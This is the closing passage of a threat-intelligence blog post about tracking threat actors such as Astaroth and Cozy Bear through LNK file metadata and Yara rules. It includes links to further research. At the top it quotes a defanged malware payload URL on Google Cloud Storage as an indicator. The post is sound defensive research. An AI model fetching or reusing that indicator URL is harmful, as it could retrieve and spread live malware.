hxxp://storage[.]googleapis[.]com/midgoldem/06/v[.]txt#025055rmxvs26ge</code></pre>
<h3 id="dont-take-my-word-for-it">Don&rsquo;t take my word for it&hellip;</h3>
<p>The above is slightly contrived, in that we only were able to look back a couple of months, and are getting results from probably the same Astaroth campaign. Sure, we probably could have written a different Yara rule and got similar (or more) results; however, the power of LNK file metadata is <em>long-term</em> tracking of threat actors who re-use the same files, and transfer their metadata from campaign <em>x</em> to campaign <em>y</em>. This &lsquo;crude&rsquo; example is a good demonstration of using this technique.</p>
<p>This tactic was nicely demonstrated in late-2018 through Fireeye&rsquo;s outing of Cozy Bear&rsquo;s reuse of a LNK file from 2016 which is detailed here: <a href="https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html">Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign</a></p>
<p>Other sources of great information are numerous entries in Harlan Carvey&rsquo;s Windows Incident Response blog:
<a href="http://windowsir.blogspot.com/2018/12/parsing-cozy-bear-lnk-file.html">Parsing the Cozy Bear LNK File</a>
<a href="http://windowsir.blogspot.com/2019/02/lnk-files.html">LNK Files</a>
<a href="http://windowsir.blogspot.com/2019/03/a-minimal-lnk.html">A Minimal LNK</a>
<a href="http://windowsir.blogspot.com/2019/04/lnk-files-in-wild.html">LNK Files In The Wild</a>
<a href="http://windowsir.blogspot.com/2018/07/lnk-toolmarks.html">LNK &ldquo;Toolmarks&rdquo;</a>
and <a href="http://windowsir.blogspot.com/">more</a>&hellip;</p>
<p>A big thanks to Harlan for recent discussions I had with him on this issue, and his assistance.</p>
<h3 id="further-research">Further research</h3>
<p>There is plenty to research in LNK files. For example, what &lsquo;toolmarks&rsquo; (if any) do the various exploitation frameworks produce when they create malicious LNK files? A parallel to the accidental &lsquo;<a href="https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/">extraneous space</a>&rsquo; that Cobalt Strike placed in the HTTP status response that allowed FOX-IT (and possibly others) to track malicious server infrastructure.</p>
<p>Another avenue might be to look at how LNK files are created manually, through the GUI, or through the API and what differences there might be in creation and editing.</p>
<p>If you have any ideas, then let me know, either via <a href="mailto:matt@bitofhex.com">matt@bitofhex.com</a> or via <a href="https://twitter.com/mattnotmax">@mattnotmax</a>. Thanks for reading!</p>

    </div>
    <div class="article-footer">
    </div>
  </article>

</div><nav class="bar bar-footer clearfix" data-stick-bottom>
    <div class="bar-inner">
        <ul class="pager pull-left">
            <li class="prev">
                <a href="https://bitofhex.com/2019/02/19/base64-encoded-signatures/" title="Base64 Encoded File Signatures"><i
                        class="icon icon-angle-left"
                        aria-hidden="true"></i><span>&nbsp;&nbsp;Older</span></a>
            </li>
            <li class="next">
                <a href="https://bitofhex.com/2019/11/17/say-cheese-an-analysis-of-foto-lnk/"
                    title="&#34;Say Cheese!&#34; An analysis of foto.lnk"><span>Newer&nbsp;&nbsp;</span><i
                        class="icon icon-angle-right" aria-hidden="true"></i></a>
            </li>
            
            <li class="toggle-toc">
                <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false"
                    title="Catalogue" role="button">
                    <span>[&nbsp;</span><span>Catalogue</span>
                    <i class="text-collapsed icon icon-anchor"></i>
                    <i class="text-in icon icon-close"></i>
                    <span>]</span>
                </a>
            </li>
        </ul>
        <div class="bar-right">
            <div class="share-component" data-sites="facebook,twitter,linkedin,google"
                data-mobile-sites="facebook,twitter,linkedin,google"></div>
        </div>
    </div>
</nav>

</main><footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
<ul class="social-links">
    <li><a href="https://github.com/mattnotmax" target="_blank" title="github" data-toggle=tooltip data-placement=top >
            <i class="icon icon-github"></i></a></li>
    <li><a href="https://bitofhex.com/index.xml" target="_blank" title="rss" data-toggle=tooltip data-placement=top >
            <i class="icon icon-rss"></i></a></li>
    <li><a href="https://twitter.com/mattnotmax" target="_blank" title="twitter" data-toggle=tooltip data-placement=top >
            <i class="icon icon-twitter"></i></a></li>
</ul>
  <div class="copyright">
    &copy;2018  -
    2020
    <div class="publishby">
        Theme by <a href="https://github.com/xiaoheiAh" target="_blank"> xiaoheiAh </a>base on<a href="https://github.com/xiaoheiAh/hugo-theme-pure" target="_blank"> pure</a>.
    </div>
  </div>
</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_SVG"></script>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
            showMathMenu: false, //disables context menu
            tex2jax: {
            inlineMath: [ ['$','$'], ['\\(','\\)'] ]
           }
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
<script>
    window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/highlight.min.js"></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/python.min.js" defer></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/javascript.min.js" defer></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/powershell.min.js" defer></script><script>
    hljs.configure({
        tabReplace: '    ', 
        classPrefix: ''     
        
    })
    hljs.initHighlightingOnLoad();
</script>
<script src="https://bitofhex.com/js/application.min.bdeb64b910570b6c41badc6a05b7afb0c8ad9efd8525de3c7257d59e786326a3.js"></script>
<script src="https://bitofhex.com/js/plugin.min.51ff8c7317566f82259170fa36e09c4493adc9b9378b427a01ad3f017ebac7dd.js"></script>

<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Categories',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            ROOT_URL: 'https:\/\/bitofhex.com\/',
            CONTENT_URL: 'https:\/\/bitofhex.com\/\/searchindex.json ',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script type="text/javascript" src="https://bitofhex.com/js/insight.min.a343cd9a5a7698336b28ef3a7c16a3a1b1d2d5fb17dc8ed04022bbe08cc5459073a15bdafa3a8a58cdd56080784bdd69fa70b1ae8597565c799c57ed00f0e120.js" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
<script>
    tocbot.init({
        
        tocSelector: '.js-toc',
        
        contentSelector: '.js-toc-content',
        
        headingSelector: 'h1, h2, h3',
        
        hasInnerContainers: true,
    });
</script>


  </body>
</html>
